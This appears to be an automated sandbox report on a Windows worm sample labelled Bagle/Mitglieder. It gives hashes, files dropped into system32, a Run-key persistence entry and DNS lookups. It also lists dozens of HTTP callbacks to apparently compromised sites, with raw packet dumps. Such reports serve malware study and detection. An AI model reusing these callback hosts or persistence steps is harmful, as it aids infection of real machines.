Analysis Date2014-01-24 10:52:42
MD5ce77f2a34059b16c2323e56eccfce633
SHA103fa990a851a62bda8d459deede1cb81ade8c748

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 74bb6a6d479f4a7993118c5c4f12a3ed sha1: a45f8cd1306f4bcc933b22c8ef90462c86934cbb size: 8192
Section.rdata md5: 6141f8b2c6f46bb0371ebd060b08bdea sha1: 9e490e685e67780bba2a4360a876b21d6cdff936 size: 4096
Section.data md5: 282ab01916d24e1c5a3050364144819e sha1: 03b4b0e312b41bda2c9163c5e4cd82db3fce3323 size: 32768
SectionPEPACK!! md5: 1c7c4354b0f3fe149818bed63dbc3299 sha1: 37885fc08c25d8dae741feba8e49cc8688241ab2 size: 12288
Timestamp2005-01-31 07:10:00
PEhashb9e0349db875472a3817bf9472f40c19ee690f72
AVmsseTrojanProxy:Win32/Mitglieder.FJ
AVaviraWORM/Bagle.Y.2
AVclamavTrojan.Proxy.Mitglieder-2
AVmcafeeW32/Bagle.gen
AVavgProxy.17.AY

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\winsystems.exe
Creates ProcessC:\WINDOWS\system32\winsystems.exe

Process
↳ C:\WINDOWS\system32\winsystems.exe

Creates FileC:\WINDOWS\system32\norat.exe
Creates FileC:\WINDOWS\system32\fo\\xc3\\xb5.exe
Creates Mutex555

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SOFTWARE\DateTime8\uid ➝
98489361
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssgrate.exe ➝
C:\WINDOWS\system32\winsystems.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpartiyazerna.1gb.ru
Winsock DNSpromco.ru
Winsock DNSmir-vesov.ru
Winsock DNSpvcps.ru
Winsock DNSmonomah-city.ru
Winsock DNSwww.psnr.ru
Winsock DNSprizmapr.ru
Winsock DNSgaz-service.ru
Winsock DNSrdwufa.ru
Winsock DNSavistrade.ru
Winsock DNSservice6.valuehost.ru
Winsock DNScomdat.de
Winsock DNSwww.13tw22rigobert.de
Winsock URLhttp://hannes-wacker.de/galerie/util/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.admlaw.ru/new/translations/scr5.php?p=37425&id=984893619
Winsock URLhttp://rdwufa.ru/img/pict/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.lowenbrau.ru/manager_old/images/blst.php
Winsock URLhttp://dabigbadboy.de/pass/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.lowenbrau.ru/manager_old/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.etype.hostingcity.net/mysql_admin_new/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://blackwidow.nsk.ru/group/zlyeyazyki/photos/scr5.php?p=37425&id=984893619
Winsock URLhttp://st-agnes.de/geschichte/scr5.php?p=37425&id=984893619
Winsock URLhttp://shop-of-innovations.de/media/scr5.php?p=37425&id=984893619
Winsock URLhttp://service6.valuehost.ru/images/blst.php
Winsock URLhttp://pvcps.ru/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://partiyazerna.1gb.ru/menu/analitika/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.ordendeslichts.de/intern/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.thomas-we.de/Design/blst.php
Winsock URLhttp://bernlocher.de/cms/img/scr5.php?p=37425&id=984893619
Winsock URLhttp://comdat.de/kreta/blst.php
Winsock URLhttp://mc-figga.de/scr5.php?p=37425&id=984893619
Winsock URLhttp://investexpo.ru/banners/scr5.php?p=37425&id=984893619
Winsock URLhttp://stroyindustry.ru/service/construction/scr5.php?p=37425&id=984893619
Winsock URLhttp://rdwufa.ru/img/pict/blst.php
Winsock URLhttp://partiyazerna.1gb.ru/menu/analitika/blst.php
Winsock URLhttp://www.thomas-we.de/Design/scr5.php?p=37425&id=984893619
Winsock URLhttp://pvcps.ru/images/blst.php
Winsock URLhttp://www.gay-traffic.de/images/banner/scr5.php?p=37425&id=984893619
Winsock URLhttp://gaz-service.ru/img/pict/scr5.php?p=37425&id=984893619
Winsock URLhttp://prizmapr.ru/test/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://mir-vesov.ru/p/lang/CVS/blst.php
Winsock URLhttp://die-cliquee.de/inhalt/mitglieder/foto/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.komandor.ru/sessions/scr5.php?p=37425&id=984893619
Winsock URLhttp://avistrade.ru/prog/img/proizvod/scr5.php?p=37425&id=984893619
Winsock URLhttp://gaz-service.ru/img/pict/blst.php
Winsock URLhttp://gnet30.gamesnet.de/photogallery/photo25939/scr5.php?p=37425&id=984893619
Winsock URLhttp://artesproduction.com/scr5.php?p=37425&id=984893619
Winsock URLKey=1.2.3.4
Winsock URLhttp://www.eurostretch.ru/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.deadlygames.de/DG/BF/BF-Links/clans/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/blst.php
Winsock URLhttp://egogo.ru/lj/0223/scr5.php?p=37425&id=984893619
Winsock URLhttp://mir-vesov.ru/p/lang/CVS/scr5.php?p=37425&id=984893619
Winsock URLhttp://multi-gaming.com/design/images/icons/scr5.php?p=37425&id=984893619
Winsock URLhttp://monomah-city.ru/vakans/blst.php
Winsock URLhttp://www.metzgerei-gebhart.de/pic/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.hhc-online.de/home/links/pics/scr5.php?p=37425&id=984893619
Winsock URLhttp://schiffsparty.de/bilder/uploads/scr5.php?p=37425&id=984893619
Winsock URLhttp://plastikp.ru/img/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.ferienwohnung-in-masuren.de/bochmann/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://tpoint.ru/sys/include/QuestionClasses/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.progame.de/newtexte/_notes/scr5.php?p=37425&id=984893619
Winsock URLhttp://avistrade.ru/prog/img/proizvod/blst.php
Winsock URLhttp://die-cliquee.de/inhalt/mitglieder/foto/blst.php
Winsock URLhttp://promco.ru/sovrem/panorama/scr5.php?p=37425&id=984893619
Winsock URLhttp://promco.ru/sovrem/panorama/blst.php
Winsock URLhttp://service6.valuehost.ru/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://monomah-city.ru/vakans/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.levada.ru/htmlarea/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://vladzernoproduct.ru/control/sell/t/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.psnr.ru/rus/images/banners/blst.php
Winsock URLhttp://sound-cell.de/prosite/pics/scr5.php?p=37425&id=984893619
Winsock URLhttp://roszvetmet.com/images/scr5.php?p=37425&id=984893619
Winsock URLhttp://web298.server7.webplus24.de/scr5.php?p=37425&id=984893619
Winsock URLhttp://unbound.de/galerie/thumbnails/scr5.php?p=37425&id=984893619
Winsock URLhttp://prizmapr.ru/test/images/blst.php
Winsock URLhttp://mir-auto.ru/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.mirage.ru/sport/omega/pic/omega/scr5.php?p=37425&id=984893619
Winsock URLMaxIPConn=1
Winsock URLhttp://www.emil-zittau.de/karten/scr5.php?p=37425&id=984893619
Winsock URLhttp://komtel.spb.ru/dk/old/using/scr5.php?p=37425&id=984893619
Winsock URLhttp://www.gasterixx.de/gfx/scr5.php?p=37425&id=984893619

Network Details:

DNSwww.suninbev.ru
Type: A
188.93.213.31
DNSgaz-service.ru
Type: A
178.21.14.52
DNSeurostretch.ru
Type: A
89.188.96.91
DNSrdwufa.ru
Type: A
92.50.166.6
DNSmir-auto.ru
Type: A
217.112.42.37
DNSavistrade.ru
Type: A
217.23.147.27
DNShhc-online.de
Type: A
81.169.145.144
DNSkomandor.ru
Type: A
212.158.167.215
DNSmonomah-city.ru
Type: A
78.108.81.40
DNSwww.mirage.ru
Type: A
77.222.40.220
DNSmir-vesov.ru
Type: A
90.156.201.45
DNSmir-vesov.ru
Type: A
90.156.201.67
DNSmir-vesov.ru
Type: A
90.156.201.64
DNSmir-vesov.ru
Type: A
90.156.201.83
DNSwww.thomas-we.de
Type: A
82.98.86.170
DNSpromco.ru
Type: A
90.156.201.87
DNSpromco.ru
Type: A
90.156.201.66
DNSpromco.ru
Type: A
90.156.201.117
DNSpromco.ru
Type: A
90.156.201.52
DNSwww.13tw22rigobert.de
Type: A
82.98.85.10
DNSdie-cliquee.de
Type: A
80.67.17.151
DNScomdat.de
Type: A
82.165.108.174
DNSplastikp.ru
Type: A
77.222.56.6
DNSwww.psnr.ru
Type: A
193.26.18.3
DNSwww.levada.ru
Type: A
89.108.110.226
DNSmulti-gaming.com
Type: A
208.48.81.134
DNSmulti-gaming.com
Type: A
64.15.205.101
DNSmulti-gaming.com
Type: A
208.48.81.133
DNSmulti-gaming.com
Type: A
64.15.205.100
DNSmetzgerei-gebhart.de
Type: A
81.169.145.158
DNSferienwohnung-in-masuren.de
Type: A
81.169.145.88
DNSwww.admlaw.ru
Type: A
82.98.86.164
DNSegogo.ru
Type: A
89.179.174.156
DNSunbound.de
Type: A
94.101.38.10
DNSmc-figga.de
Type: A
213.239.222.12
DNSinvestexpo.ru
Type: A
82.98.86.172
DNSblackwidow.nsk.ru
Type: A
193.232.179.67
DNSwww.emil-zittau.de
Type: A
85.13.133.93
DNSwww.ordendeslichts.de
Type: A
109.91.219.149
DNSstroyindustry.ru
Type: A
90.156.201.67
DNSstroyindustry.ru
Type: A
90.156.201.19
DNSstroyindustry.ru
Type: A
90.156.201.21
DNSstroyindustry.ru
Type: A
90.156.201.85
DNSvladzernoproduct.ru
Type: A
90.156.201.25
DNSvladzernoproduct.ru
Type: A
90.156.201.22
DNSvladzernoproduct.ru
Type: A
90.156.201.45
DNSvladzernoproduct.ru
Type: A
90.156.201.115
DNShannes-wacker.de
Type: A
69.43.160.190
DNSschiffsparty.de
Type: A
188.138.41.38
DNSsound-cell.de
Type: A
85.13.137.29
DNSbernlocher.de
Type: A
87.106.62.45
DNSwww.gay-traffic.de
Type: A
141.8.224.25
DNSprogame.de
Type: A
195.30.107.89
DNSst-agnes.de
Type: A
91.90.158.104
DNSweb298.server7.webplus24.de
Type: A
82.210.20.7
DNSgnet30.gamesnet.de
Type: A
127.0.0.1
DNSroszvetmet.com
Type: A
208.87.149.250
DNSwww.lowenbrau.ru
Type: A
DNSwww.gasterixx.de
Type: A
DNSwww.deadlygames.de
Type: A
DNSwww.eurostretch.ru
Type: A
DNSprizmapr.ru
Type: A
DNSartesproduction.com
Type: A
DNSwww.hhc-online.de
Type: A
DNSservice6.valuehost.ru
Type: A
DNSwww.komandor.ru
Type: A
DNSpvcps.ru
Type: A
DNSpartiyazerna.1gb.ru
Type: A
DNSwww.metzgerei-gebhart.de
Type: A
DNSwww.ferienwohnung-in-masuren.de
Type: A
DNSwww.etype.hostingcity.net
Type: A
DNStpoint.ru
Type: A
DNSshop-of-innovations.de
Type: A
DNSkomtel.spb.ru
Type: A
DNSwww.progame.de
Type: A
DNSdabigbadboy.de
Type: A
HTTP GEThttp://www.lowenbrau.ru/manager_old/images/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.lowenbrau.ru/manager_old/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://gaz-service.ru/img/pict/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.eurostretch.ru/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://rdwufa.ru/img/pict/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://mir-auto.ru/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://avistrade.ru/prog/img/proizvod/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hhc-online.de/home/links/pics/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://gaz-service.ru/img/pict/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://rdwufa.ru/img/pict/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.komandor.ru/sessions/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://monomah-city.ru/vakans/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.mirage.ru/sport/omega/pic/omega/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://avistrade.ru/prog/img/proizvod/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.thomas-we.de/Design/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://mir-vesov.ru/p/lang/CVS/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://monomah-city.ru/vakans/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://promco.ru/sovrem/panorama/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://mir-vesov.ru/p/lang/CVS/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://promco.ru/sovrem/panorama/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://die-cliquee.de/inhalt/mitglieder/foto/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://die-cliquee.de/inhalt/mitglieder/foto/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.lowenbrau.ru/manager_old/images/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://comdat.de/kreta/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://plastikp.ru/img/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.psnr.ru/rus/images/banners/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://gaz-service.ru/img/pict/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.levada.ru/htmlarea/images/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://rdwufa.ru/img/pict/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://avistrade.ru/prog/img/proizvod/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.thomas-we.de/Design/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://monomah-city.ru/vakans/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://mir-vesov.ru/p/lang/CVS/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://promco.ru/sovrem/panorama/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.13tw22rigobert.de/_themes/kopie-von-fantasie-in-blau/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://multi-gaming.com/design/images/icons/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://die-cliquee.de/inhalt/mitglieder/foto/blst.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.metzgerei-gebhart.de/pic/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.ferienwohnung-in-masuren.de/bochmann/images/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.admlaw.ru/new/translations/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://egogo.ru/lj/0223/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://unbound.de/galerie/thumbnails/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://mc-figga.de/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://investexpo.ru/banners/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://blackwidow.nsk.ru/group/zlyeyazyki/photos/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.emil-zittau.de/karten/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.ordendeslichts.de/intern/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://stroyindustry.ru/service/construction/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://vladzernoproduct.ru/control/sell/t/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://hannes-wacker.de/galerie/util/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://schiffsparty.de/bilder/uploads/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://sound-cell.de/prosite/pics/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://bernlocher.de/cms/img/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.gay-traffic.de/images/banner/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://www.progame.de/newtexte/_notes/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://st-agnes.de/geschichte/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://web298.server7.webplus24.de/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
HTTP GEThttp://roszvetmet.com/images/scr5.php?p=37425&id=984893619
User-Agent: szNotifyIdent
Flows TCP192.168.1.1:1037 ➝ 188.93.213.31:80
Flows TCP192.168.1.1:1038 ➝ 188.93.213.31:80
Flows TCP192.168.1.1:1040 ➝ 178.21.14.52:80
Flows TCP192.168.1.1:1041 ➝ 89.188.96.91:80
Flows TCP192.168.1.1:1042 ➝ 92.50.166.6:80
Flows TCP192.168.1.1:1043 ➝ 217.112.42.37:80
Flows TCP192.168.1.1:1044 ➝ 217.23.147.27:80
Flows TCP192.168.1.1:1045 ➝ 81.169.145.144:80
Flows TCP192.168.1.1:1046 ➝ 178.21.14.52:80
Flows TCP192.168.1.1:1047 ➝ 92.50.166.6:80
Flows TCP192.168.1.1:1048 ➝ 212.158.167.215:80
Flows TCP192.168.1.1:1049 ➝ 78.108.81.40:80
Flows TCP192.168.1.1:1050 ➝ 77.222.40.220:80
Flows TCP192.168.1.1:1051 ➝ 217.23.147.27:80
Flows TCP192.168.1.1:1053 ➝ 82.98.86.170:80
Flows TCP192.168.1.1:1052 ➝ 90.156.201.45:80
Flows TCP192.168.1.1:1054 ➝ 78.108.81.40:80
Flows TCP192.168.1.1:1055 ➝ 90.156.201.87:80
Flows TCP192.168.1.1:1056 ➝ 90.156.201.45:80
Flows TCP192.168.1.1:1057 ➝ 90.156.201.87:80
Flows TCP192.168.1.1:1058 ➝ 82.98.85.10:80
Flows TCP192.168.1.1:1059 ➝ 82.98.85.10:80
Flows TCP192.168.1.1:1060 ➝ 80.67.17.151:80
Flows TCP192.168.1.1:1061 ➝ 80.67.17.151:80
Flows TCP192.168.1.1:1062 ➝ 188.93.213.31:80
Flows TCP192.168.1.1:1063 ➝ 82.165.108.174:80
Flows TCP192.168.1.1:1064 ➝ 77.222.56.6:80
Flows TCP192.168.1.1:1065 ➝ 193.26.18.3:80
Flows TCP192.168.1.1:1066 ➝ 178.21.14.52:80
Flows TCP192.168.1.1:1068 ➝ 89.108.110.226:80
Flows TCP192.168.1.1:1067 ➝ 92.50.166.6:80
Flows TCP192.168.1.1:1069 ➝ 217.23.147.27:80
Flows TCP192.168.1.1:1070 ➝ 82.98.86.170:80
Flows TCP192.168.1.1:1071 ➝ 78.108.81.40:80
Flows TCP192.168.1.1:1072 ➝ 90.156.201.45:80
Flows TCP192.168.1.1:1073 ➝ 90.156.201.87:80
Flows TCP192.168.1.1:1074 ➝ 82.98.85.10:80
Flows TCP192.168.1.1:1075 ➝ 208.48.81.134:80
Flows TCP192.168.1.1:1076 ➝ 80.67.17.151:80
Flows TCP192.168.1.1:1077 ➝ 81.169.145.158:80
Flows TCP192.168.1.1:1078 ➝ 81.169.145.88:80
Flows TCP192.168.1.1:1079 ➝ 82.98.86.164:80
Flows TCP192.168.1.1:1080 ➝ 89.179.174.156:80
Flows TCP192.168.1.1:1081 ➝ 94.101.38.10:80
Flows TCP192.168.1.1:1082 ➝ 213.239.222.12:80
Flows TCP192.168.1.1:1083 ➝ 82.98.86.172:80
Flows TCP192.168.1.1:1084 ➝ 193.232.179.67:80
Flows TCP192.168.1.1:1085 ➝ 85.13.133.93:80
Flows TCP192.168.1.1:1086 ➝ 109.91.219.149:80
Flows TCP192.168.1.1:1087 ➝ 90.156.201.67:80
Flows TCP192.168.1.1:1088 ➝ 90.156.201.25:80
Flows TCP192.168.1.1:1089 ➝ 69.43.160.190:80
Flows TCP192.168.1.1:1090 ➝ 188.138.41.38:80
Flows TCP192.168.1.1:1091 ➝ 85.13.137.29:80
Flows TCP192.168.1.1:1092 ➝ 87.106.62.45:80
Flows TCP192.168.1.1:1093 ➝ 141.8.224.25:80
Flows TCP192.168.1.1:1094 ➝ 195.30.107.89:80
Flows TCP192.168.1.1:1095 ➝ 91.90.158.104:80
Flows TCP192.168.1.1:1096 ➝ 82.210.20.7:80
Flows TCP192.168.1.1:1098 ➝ 208.87.149.250:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d616e 61676572 5f6f6c64   GET /manager_old
0x00000010 (00016)   2f696d61 6765732f 73637235 2e706870   /images/scr5.php
0x00000020 (00032)   3f703d33 37343235 2669643d 39383438   ?p=37425&id=9848
0x00000030 (00048)   39333631 39204854 54502f31 2e310d0a   93619 HTTP/1.1..
0x00000040 (00064)   55736572 2d416765 6e743a20 737a4e6f   User-Agent: szNo
0x00000050 (00080)   74696679 4964656e 740d0a48 6f73743a   tifyIdent..Host:
0x00000060 (00096)   20777777 2e6c6f77 656e6272 61752e72    www.lowenbrau.r
0x00000070 (00112)   750d0a0d 0a                           u....

0x00000000 (00000)   47455420 2f6d616e 61676572 5f6f6c64   GET /manager_old
0x00000010 (00016)   2f696d61 6765732f 626c7374 2e706870   /images/blst.php
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000040 (00064)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000050 (00080)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000060 (00096)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000070 (00112)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000080 (00128)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000090 (00144)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000a0 (00160)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000b0 (00176)   0a486f73 743a2077 77772e6c 6f77656e   .Host: www.lowen
0x000000c0 (00192)   62726175 2e72750d 0a436f6e 6e656374   brau.ru..Connect
0x000000d0 (00208)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696d67 2f706963 742f626c   GET /img/pict/bl
0x00000010 (00016)   73742e70 68702048 5454502f 312e310d   st.php HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 2067617a   0727)..Host: gaz
0x000000b0 (00176)   2d736572 76696365 2e72750d 0a436f6e   -service.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a65 702d416c 6976650d   ive....ep-Alive.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f736372 352e7068 703f703d   GET /scr5.php?p=
0x00000010 (00016)   33373432 35266964 3d393834 38393336   37425&id=9848936
0x00000020 (00032)   31392048 5454502f 312e310d 0a557365   19 HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20737a4e 6f746966   r-Agent: szNotif
0x00000040 (00064)   79496465 6e740d0a 486f7374 3a207777   yIdent..Host: ww
0x00000050 (00080)   772e6575 726f7374 72657463 682e7275   w.eurostretch.ru
0x00000060 (00096)   0d0a0d0a 30202863 6f6d7061 7469626c   ....0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 2067617a   0727)..Host: gaz
0x000000b0 (00176)   2d736572 76696365 2e72750d 0a436f6e   -service.ru..Con
0x000000c0 (00192)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000d0 (00208)   6976650d 0a0d0a65 702d416c 6976650d   ive....ep-Alive.
0x000000e0 (00224)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696d67 2f706963 742f626c   GET /img/pict/bl
0x00000010 (00016)   73742e70 68702048 5454502f 312e310d   st.php HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20726477   0727)..Host: rdw
0x000000b0 (00176)   7566612e 72750d0a 436f6e6e 65637469   ufa.ru..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
